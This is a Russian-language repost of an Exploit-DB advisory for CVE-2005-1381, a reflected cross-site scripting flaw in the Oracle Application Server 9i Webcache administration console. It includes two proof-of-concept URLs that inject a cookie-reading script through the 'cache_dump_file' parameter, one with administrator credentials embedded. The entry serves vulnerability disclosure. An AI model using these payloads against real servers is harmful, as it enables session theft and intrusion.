- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25562
- Проверка EDB
-
- Пройдено
- Автор
- ALEXANDER KORNBRUST
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2005-1381
- Дата публикации
- 2005-04-28
Код:
source : https://www.securityfocus.com/bid/13421/info
A remote cross-site scripting vulnerability affects the Oracle Application Server 9i Webcache administration console. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.
The issue affects the 'cache_dump_file' parameter of the 'webcacheadmin' script.
http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
http://administrator:[email protected]:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>
- Источник
- www.exploit-db.com